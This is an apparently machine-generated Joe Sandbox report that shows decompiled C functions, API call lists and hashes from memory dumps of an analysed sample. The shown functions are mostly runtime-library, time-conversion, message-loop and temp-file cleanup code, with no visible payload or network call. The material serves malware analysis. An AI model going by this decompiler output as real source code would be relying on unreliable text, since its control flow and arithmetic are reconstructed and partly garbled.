                                                        • SetLastError.KERNEL32(00000000,?,00A22361,00A1FDB2), ref: 00A223F1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastValue___vcrt_
                                                        • String ID:
                                                        • API String ID: 3852720340-0
                                                        • Opcode ID: 6403baa9b5a3f3315968fd5d15977b0dc4f3a38b69f8a90644d39986c2c59a31
                                                        • Instruction ID: 1636428c10df8b476b1e86417abc5a88017c44bf4bc05bf21727e410b01ff7ed
                                                        • Opcode Fuzzy Hash: 6403baa9b5a3f3315968fd5d15977b0dc4f3a38b69f8a90644d39986c2c59a31
                                                        • Instruction Fuzzy Hash: 5C01A733209B317FBA58EBFD7D8676B6B58EB62774720063AF210591E1EF594C025344
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DF61 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        C-Code - Quality: 77%
                                                        			E00A1DF61() {
				intOrPtr _t1;
				_Unknown_base(*)()* _t3;
				void* _t5;
				_Unknown_base(*)()* _t6;
				struct HINSTANCE__* _t14;

				_t1 =  *0xa60cd0;
				if(_t1 != 1) {
					if(_t1 == 0) {
						_t14 = GetModuleHandleW(L"KERNEL32.DLL");
						if(_t14 != 0) {
							_t3 = GetProcAddress(_t14, "AcquireSRWLockExclusive");
							if(_t3 == 0) {
								goto L5;
							} else {
								 *0xa60cd4 = _t3;
								_t6 = GetProcAddress(_t14, "ReleaseSRWLockExclusive");
								if(_t6 == 0) {
									goto L5;
								} else {
									 *0xa60cd8 = _t6;
								}
							}
						} else {
							L5:
							_t14 = 1;
						}
						asm("lock cmpxchg [edx], ecx");
						if(0 != 0 || _t14 != 1) {
							if(0 != 1) {
								_t5 = 1;
							} else {
								goto L12;
							}
						} else {
							L12:
							_t5 = 0;
						}
						return _t5;
					} else {
						return 1;
					}
				} else {
					return 0;
				}
			}








                                                        0x00a1df61
                                                        0x00a1df6c
                                                        0x00a1df74
                                                        0x00a1df86
                                                        0x00a1df8a
                                                        0x00a1df96
                                                        0x00a1df9e
                                                        0x00000000
                                                        0x00a1dfa0
                                                        0x00a1dfa6
                                                        0x00a1dfab
                                                        0x00a1dfb3
                                                        0x00000000
                                                        0x00a1dfb5
                                                        0x00a1dfb5
                                                        0x00a1dfb5
                                                        0x00a1dfb3
                                                        0x00a1df8c
                                                        0x00a1df8c
                                                        0x00a1df8c
                                                        0x00a1df8c
                                                        0x00a1dfc3
                                                        0x00a1dfc9
                                                        0x00a1dfd1
                                                        0x00a1dfd7
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1dfd3
                                                        0x00a1dfd3
                                                        0x00a1dfd3
                                                        0x00a1dfd3
                                                        0x00a1dfdb
                                                        0x00a1df76
                                                        0x00a1df79
                                                        0x00a1df79
                                                        0x00a1df6e
                                                        0x00a1df71
                                                        0x00a1df71

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                        • API String ID: 0-1718035505
                                                        • Opcode ID: b0be91df0a1479df9a1ecb22c6838cd4abfb7e7ed91fd963ab834ff3d721d36d
                                                        • Instruction ID: 9ff6e8d7f5a43a743347ce0a46adb9458d9ed4c28c9c360ac8fab0738f924b20
                                                        • Opcode Fuzzy Hash: b0be91df0a1479df9a1ecb22c6838cd4abfb7e7ed91fd963ab834ff3d721d36d
                                                        • Instruction Fuzzy Hash: 6C01C8726416226B4F249FF85C80AE767E5AA02357710457AF503E7240DB91CAD7D6A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A10F8E Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 68%
                                                        			E00A10F8E(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				struct _SYSTEMTIME _v44;
				struct _SYSTEMTIME _v60;
				struct _SYSTEMTIME _v76;
				intOrPtr _t47;
				intOrPtr _t61;
				intOrPtr* _t66;
				long _t72;
				intOrPtr _t73;
				intOrPtr* _t76;

				_t73 = __edx;
				_t66 = _a4;
				_t76 = __ecx;
				_v44.wYear =  *_t66;
				_t3 = _t66 + 4; // 0x8b550004
				_v44.wMonth =  *_t3;
				_t5 = _t66 + 8; // 0x48ec83ec
				_v44.wDay =  *_t5;
				_t7 = _t66 + 0xc; // 0x85d8b53
				_v44.wHour =  *_t7;
				_t9 = _t66 + 0x10; // 0xf18b5756
				_v44.wMinute =  *_t9;
				_t11 = _t66 + 0x14; // 0x66038b66
				_v44.wSecond =  *_t11;
				_v44.wMilliseconds = 0;
				_v44.wDayOfWeek = 0;
				if(SystemTimeToFileTime( &_v44,  &_v20) == 0) {
					 *_t76 = 0;
					 *((intOrPtr*)(_t76 + 4)) = 0;
				} else {
					if(E00A0AEE5() >= 0x600) {
						FileTimeToSystemTime( &_v20,  &_v60);
						__imp__TzSpecificLocalTimeToSystemTime(0,  &_v60,  &_v76);
						SystemTimeToFileTime( &_v76,  &_v12);
						SystemTimeToFileTime( &_v60,  &_v28);
						_t61 = _v12.dwHighDateTime + _v20.dwHighDateTime;
						asm("sbb eax, [ebp-0x14]");
						asm("sbb eax, edi");
						asm("adc eax, edi");
						_t72 = 0 - _v28.dwLowDateTime + _v12.dwLowDateTime + _v20.dwLowDateTime;
						asm("adc eax, edi");
					} else {
						LocalFileTimeToFileTime( &_v20,  &_v12);
						_t61 = _v12.dwHighDateTime;
						_t72 = _v12.dwLowDateTime;
					}
					 *_t76 = E00A1EA90(_t72, _t61, 0x64, 0);
					 *((intOrPtr*)(_t76 + 4)) = _t73;
				}
				_t36 = _t66 + 0x18; // 0x66d84589
				_t47 =  *_t36;
				 *_t76 =  *_t76 + _t47;
				asm("adc [esi+0x4], edi");
				return _t47;
			}















                                                        0x00a10f8e
                                                        0x00a10f95
                                                        0x00a10f9a
                                                        0x00a10f9f
                                                        0x00a10fa3
                                                        0x00a10fa7
                                                        0x00a10fab
                                                        0x00a10faf
                                                        0x00a10fb3
                                                        0x00a10fb7
                                                        0x00a10fbb
                                                        0x00a10fbf
                                                        0x00a10fc3
                                                        0x00a10fc7
                                                        0x00a10fcd
                                                        0x00a10fd1
                                                        0x00a10fe5
                                                        0x00a11077
                                                        0x00a11079
                                                        0x00a10feb
                                                        0x00a10ff7
                                                        0x00a11017
                                                        0x00a11026
                                                        0x00a11034
                                                        0x00a11042
                                                        0x00a1104d
                                                        0x00a11052
                                                        0x00a11058
                                                        0x00a1105d
                                                        0x00a1105f
                                                        0x00a11062
                                                        0x00a10ff9
                                                        0x00a11001
                                                        0x00a11007
                                                        0x00a1100a
                                                        0x00a1100a
                                                        0x00a1106e
                                                        0x00a11070
                                                        0x00a11070
                                                        0x00a1107c
                                                        0x00a1107c
                                                        0x00a1107f
                                                        0x00a11081
                                                        0x00a1108a

                                                        APIs
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A10FDD
                                                          • Part of subcall function 00A0AEE5: GetVersionExW.KERNEL32(?), ref: 00A0AF0A
                                                        • LocalFileTimeToFileTime.KERNEL32(?,00A10F88), ref: 00A11001
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A11017
                                                        • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00A11026
                                                        • SystemTimeToFileTime.KERNEL32(?,00A10F88), ref: 00A11034
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A11042
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: Time$File$System$Local$SpecificVersion
                                                        • String ID:
                                                        • API String ID: 2092733347-0
                                                        • Opcode ID: 7ac6845d0b088d82db1050ee6183e144847ec4a275ca0cb726a38d966aab76b4
                                                        • Instruction ID: f536be927f3f74e33942619b4ce460b8ab9c6429e87b9528ce59a11bb7daaac6
                                                        • Opcode Fuzzy Hash: 7ac6845d0b088d82db1050ee6183e144847ec4a275ca0cb726a38d966aab76b4
                                                        • Instruction Fuzzy Hash: 2131057A90020AEBCF00DFE4C8859EFBBBCFF58300B04451AEA55E3210E7309A85CB65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A19400 Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 81%
                                                        			E00A19400(signed int _a4, intOrPtr _a8, signed int* _a12) {
				void* _t17;
				signed int _t23;
				void* _t26;
				signed int _t32;
				signed int* _t36;

				_t36 = _a12;
				if(_t36 != 0) {
					_t34 = _a8;
					_t26 = 0x10;
					if(E00A2009A(_a8, 0xa353ac, _t26) == 0) {
						L13:
						_t32 = _a4;
						 *_t36 = _t32;
						L14:
						 *0xa33260(_t32);
						 *((intOrPtr*)( *((intOrPtr*)( *_t32 + 4))))();
						_t17 = 0;
						L16:
						return _t17;
					}
					if(E00A2009A(_t34, 0xa353ec, _t26) != 0) {
						if(E00A2009A(_t34, 0xa353cc, _t26) != 0) {
							if(E00A2009A(_t34, 0xa3539c, _t26) != 0) {
								if(E00A2009A(_t34, 0xa3543c, _t26) != 0) {
									if(E00A2009A(_t34, 0xa3538c, _t26) != 0) {
										 *_t36 =  *_t36 & 0x00000000;
										_t17 = 0x80004002;
										goto L16;
									}
									goto L13;
								}
								_t32 = _a4;
								_t23 = _t32 + 0x10;
								L11:
								asm("sbb ecx, ecx");
								 *_t36 =  ~_t32 & _t23;
								goto L14;
							}
							_t32 = _a4;
							_t23 = _t32 + 0xc;
							goto L11;
						}
						_t32 = _a4;
						_t23 = _t32 + 8;
						goto L11;
					}
					_t32 = _a4;
					_t23 = _t32 + 4;
					goto L11;
				}
				return 0x80004003;
			}








                                                        0x00a19404
                                                        0x00a19409
                                                        0x00a19417
                                                        0x00a1941c
                                                        0x00a1942e
                                                        0x00a194bd
                                                        0x00a194bd
                                                        0x00a194c0
                                                        0x00a194c2
                                                        0x00a194ca
                                                        0x00a194d0
                                                        0x00a194d2
                                                        0x00a194de
                                                        0x00000000
                                                        0x00a194df
                                                        0x00a19445
                                                        0x00a19460
                                                        0x00a1947b
                                                        0x00a19496
                                                        0x00a194bb
                                                        0x00a194d6
                                                        0x00a194d9
                                                        0x00000000
                                                        0x00a194d9
                                                        0x00000000
                                                        0x00a194bb
                                                        0x00a19498
                                                        0x00a1949b
                                                        0x00a1949e
                                                        0x00a194a2
                                                        0x00a194a6
                                                        0x00000000
                                                        0x00a194a6
                                                        0x00a1947d
                                                        0x00a19480
                                                        0x00000000
                                                        0x00a19480
                                                        0x00a19462
                                                        0x00a19465
                                                        0x00000000
                                                        0x00a19465
                                                        0x00a19447
                                                        0x00a1944a
                                                        0x00000000
                                                        0x00a1944a
                                                        0x00000000

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: _memcmp
                                                        • String ID:
                                                        • API String ID: 2931989736-0
                                                        • Opcode ID: 188b404e1e759c57eb524778da15d31926d6a83e04016e8979d07d8a5cf4bcfb
                                                        • Instruction ID: c385dabd2dcfdf4bc461dcc19c7a6cab9d5883e66466843a06f110cf9421c9fd
                                                        • Opcode Fuzzy Hash: 188b404e1e759c57eb524778da15d31926d6a83e04016e8979d07d8a5cf4bcfb
                                                        • Instruction Fuzzy Hash: 1921A17160421EABE7149F29DD91FAB77ADAB51B84B048528FC089B202F670ED86C6D1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A292B5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        C-Code - Quality: 72%
                                                        			E00A292B5(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0xa3e6ac; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00A288C9(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E00A2A981(_t25, _t36, __eflags,  *0xa3e6ac, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00A2911B(_t25, _t31, 0xa61290);
							E00A287FE(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00A287FE();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00A28886(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0xa3e6ac; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00A288C9(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E00A2A981(_t27, _t37, __eflags,  *0xa3e6ac, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00A2911B(_t27, _t32, 0xa61290);
									E00A287FE(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00A287FE();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00A2A92B(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00A2A92B(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                                                        0x00a292b5
                                                        0x00a292b5
                                                        0x00a292b5
                                                        0x00a292bf
                                                        0x00a292c1
                                                        0x00a292c6
                                                        0x00a292c9
                                                        0x00a292d7
                                                        0x00a292de
                                                        0x00a292e3
                                                        0x00a292e6
                                                        0x00a292e9
                                                        0x00a292fb
                                                        0x00a29300
                                                        0x00a29302
                                                        0x00a2930d
                                                        0x00a29314
                                                        0x00a29319
                                                        0x00a2931c
                                                        0x00a2931e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a29304
                                                        0x00a29304
                                                        0x00000000
                                                        0x00a29304
                                                        0x00a292eb
                                                        0x00a292eb
                                                        0x00a292ec
                                                        0x00a292ec
                                                        0x00a292f1
                                                        0x00a2932c
                                                        0x00a2932d
                                                        0x00a29333
                                                        0x00a29338
                                                        0x00a2933b
                                                        0x00a2933c
                                                        0x00a2933d
                                                        0x00a29344
                                                        0x00a29346
                                                        0x00a29348
                                                        0x00a2934d
                                                        0x00a29350
                                                        0x00a2935e
                                                        0x00a2936a
                                                        0x00a2936d
                                                        0x00a29370
                                                        0x00a29382
                                                        0x00a29387
                                                        0x00a29389
                                                        0x00a29394
                                                        0x00a2939a
                                                        0x00a293a2
                                                        0x00a293a4
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2938b
                                                        0x00a2938b
                                                        0x00000000
                                                        0x00a2938b
                                                        0x00a29372
                                                        0x00a29372
                                                        0x00a29373
                                                        0x00a29373
                                                        0x00a293a6
                                                        0x00a293a7
                                                        0x00a293a7
                                                        0x00a29352
                                                        0x00a29358
                                                        0x00a2935c
                                                        0x00a293af
                                                        0x00a293b0
                                                        0x00a293b6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2935c
                                                        0x00a293bd
                                                        0x00a293bd
                                                        0x00a292cb
                                                        0x00a292d1
                                                        0x00a292d5
                                                        0x00a29320
                                                        0x00a29321
                                                        0x00a2932b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a292d5

                                                        APIs
                                                        • GetLastError.KERNEL32(?,00A40F50,00A240E4,00A40F50,?,?,00A23B5F,?,?,00A40F50), ref: 00A292B9
                                                        • _free.LIBCMT ref: 00A292EC
                                                        • _free.LIBCMT ref: 00A29314
                                                        • SetLastError.KERNEL32(00000000,?,00A40F50), ref: 00A29321
                                                        • SetLastError.KERNEL32(00000000,?,00A40F50), ref: 00A2932D
                                                        • _abort.LIBCMT ref: 00A29333
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_free$_abort
                                                        • String ID:
                                                        • API String ID: 3160817290-0
                                                        • Opcode ID: 5793fe5fa113e121e0dda3d93121e89a860fab72e8c7743f271ad0d8e437680e
                                                        • Instruction ID: bb142c362221a41b39419a37f8988e4acd1e60a61518d0f59c17d0e47461e3bf
                                                        • Opcode Fuzzy Hash: 5793fe5fa113e121e0dda3d93121e89a860fab72e8c7743f271ad0d8e437680e
                                                        • Instruction Fuzzy Hash: 25F0283390563077C606F37E7E0AB6B3A299BD1B60F350138F51AD61D2EF348C024524
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1D5A3 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A1D5A3(void* _a4) {
				struct tagMSG _v32;
				long _t7;
				long _t10;

				_t7 = WaitForSingleObject(_a4, 0xa);
				if(_t7 == 0x102) {
					do {
						if(PeekMessageW( &_v32, 0, 0, 0, 0) != 0) {
							GetMessageW( &_v32, 0, 0, 0);
							TranslateMessage( &_v32);
							DispatchMessageW( &_v32);
						}
						_t10 = WaitForSingleObject(_a4, 0xa);
					} while (_t10 == 0x102);
					return _t10;
				}
				return _t7;
			}






                                                        0x00a1d5af
                                                        0x00a1d5bc
                                                        0x00a1d5c1
                                                        0x00a1d5d1
                                                        0x00a1d5da
                                                        0x00a1d5e4
                                                        0x00a1d5ee
                                                        0x00a1d5ee
                                                        0x00a1d5f9
                                                        0x00a1d5ff
                                                        0x00000000
                                                        0x00a1d603
                                                        0x00a1d608

                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00A1D5AF
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A1D5C9
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A1D5DA
                                                        • TranslateMessage.USER32(?), ref: 00A1D5E4
                                                        • DispatchMessageW.USER32(?), ref: 00A1D5EE
                                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00A1D5F9
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                        • String ID:
                                                        • API String ID: 2148572870-0
                                                        • Opcode ID: 9565a633340a9dddd302a9834c942bc59d7227fbb85ba7013c46686241e5390d
                                                        • Instruction ID: c59ff83b18958e6d5aeaa9beb78754f2f1e27f5dbfac5eb6091db309a19a9c46
                                                        • Opcode Fuzzy Hash: 9565a633340a9dddd302a9834c942bc59d7227fbb85ba7013c46686241e5390d
                                                        • Instruction Fuzzy Hash: B5F04F72A01519BBCF209BE1EC4CEDBBF7EEF523A1B004012F606D6051D6759942C7A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1C7C3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1C7C3(intOrPtr __ebx, void* __ecx) {
				intOrPtr _t222;
				void* _t223;
				intOrPtr _t274;
				signed int _t288;
				void* _t291;
				signed int _t292;
				void* _t296;

				L0:
				while(1) {
					L0:
					_t274 = __ebx;
					if(__ebx != 1) {
						goto L122;
					}
					L106:
					__eax = __ebp - 0x7d50;
					__edi = 0x800;
					GetTempPathW(0x800, __ebp - 0x7d50) = __ebp - 0x7d50;
					E00A0B3F7(__eflags, __ebp - 0x7d50, 0x800) = 0;
					__esi = 0;
					_push(0);
					while(1) {
						L108:
						_push( *0xa3e5f8);
						__ebp - 0x7d50 = E00A03F8F(0xa4946a, __edi, L"%s%s%u", __ebp - 0x7d50);
						__eax = E00A0A373(0xa4946a);
						__eflags = __al;
						if(__al == 0) {
							break;
						}
						L107:
						__esi =  &(__esi->i);
						__eflags = __esi;
						_push(__esi);
					}
					L109:
					__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0xa4946a);
					__eflags =  *(__ebp - 0x3508);
					if( *(__ebp - 0x3508) == 0) {
						while(1) {
							L174:
							_push(0x1000);
							_t210 = _t296 - 0x15; // 0xffffcae3
							_t211 = _t296 - 0xd; // 0xffffcaeb
							_t212 = _t296 - 0x3508; // 0xffff95f0
							_t213 = _t296 - 0xfd58; // 0xfffecda0
							_push( *((intOrPtr*)(_t296 + 0xc)));
							_t222 = E00A1ACC6();
							_t274 =  *((intOrPtr*)(_t296 + 0x10));
							 *((intOrPtr*)(_t296 + 0xc)) = _t222;
							if(_t222 != 0) {
								_t223 = _t296 - 0x3508;
								_t291 = _t296 - 0x1bd58;
								_t288 = 6;
								goto L2;
							} else {
								break;
							}
							L4:
							while(E00A11AC4(_t296 - 0xfd58,  *((intOrPtr*)(0xa3e618 + _t292 * 4))) != 0) {
								_t292 = _t292 + 1;
								if(_t292 < 0xe) {
									continue;
								} else {
									goto L174;
								}
							}
							__eflags = _t292 - 0xd;
							if(__eflags > 0) {
								continue;
							}
							L8:
							switch( *((intOrPtr*)(_t292 * 4 +  &M00A1CD65))) {
								case 0:
									L9:
									__eflags = _t274 - 2;
									if(__eflags == 0) {
										E00A1A004(_t296 - 0x7d50, 0x800);
										E00A0A690(E00A0BB55(__eflags, _t296 - 0x7d50, _t296 - 0x3508, _t296 - 0xdd58, 0x800), _t274, _t296 - 0x8d58, _t292);
										 *(_t296 - 4) = 0;
										E00A0A7CA(_t296 - 0x8d58, _t296 - 0xdd58);
										E00A07119(_t296 - 0x5d50);
										while(1) {
											L23:
											_push(0);
											_t282 = _t296 - 0x8d58;
											_t237 = E00A0A71D(_t296 - 0x8d58, _t287, _t296 - 0x5d50);
											__eflags = _t237;
											if(_t237 == 0) {
												break;
											}
											L11:
											SetFileAttributesW(_t296 - 0x5d50, 0);
											__eflags =  *(_t296 - 0x4d44);
											if(__eflags == 0) {
												L16:
												_t241 = GetFileAttributesW(_t296 - 0x5d50);
												__eflags = _t241 - 0xffffffff;
												if(_t241 == 0xffffffff) {
													continue;
												}
												L17:
												_t243 = DeleteFileW(_t296 - 0x5d50);
												__eflags = _t243;
												if(_t243 != 0) {
													continue;
												} else {
													_t294 = 0;
													_push(0);
													goto L20;
													L20:
													E00A03F8F(_t296 - 0x1108, 0x800, L"%s.%d.tmp", _t296 - 0x5d50);
													_t298 = _t298 + 0x14;
													_t248 = GetFileAttributesW(_t296 - 0x1108);
													__eflags = _t248 - 0xffffffff;
													if(_t248 != 0xffffffff) {
														_t294 = _t294 + 1;
														__eflags = _t294;
														_push(_t294);
														goto L20;
													} else {
														_t251 = MoveFileW(_t296 - 0x5d50, _t296 - 0x1108);
														__eflags = _t251;
														if(_t251 != 0) {
															MoveFileExW(_t296 - 0x1108, 0, 4);
														}
														continue;
													}
												}
											}
											L12:
											E00A0B6E7(_t282, __eflags, _t296 - 0x7d50, _t296 - 0x1108, 0x800);
											E00A0B3F7(__eflags, _t296 - 0x1108, 0x800);
											_t295 = E00A23883(_t296 - 0x7d50);
											__eflags = _t295 - 4;
											if(_t295 < 4) {
												L14:
												_t262 = E00A0BB15(_t296 - 0x3508);
												__eflags = _t262;
												if(_t262 != 0) {
													break;
												}
												L15:
												_t265 = E00A23883(_t296 - 0x5d50);
												__eflags = 0;
												 *((short*)(_t296 + _t265 * 2 - 0x5d4e)) = 0;
												E00A1F5F0(0x800, _t296 - 0x40, 0, 0x1e);
												_t298 = _t298 + 0x10;
												 *((intOrPtr*)(_t296 - 0x3c)) = 3;
												_push(0x14);
												_pop(_t268);
												 *((short*)(_t296 - 0x30)) = _t268;
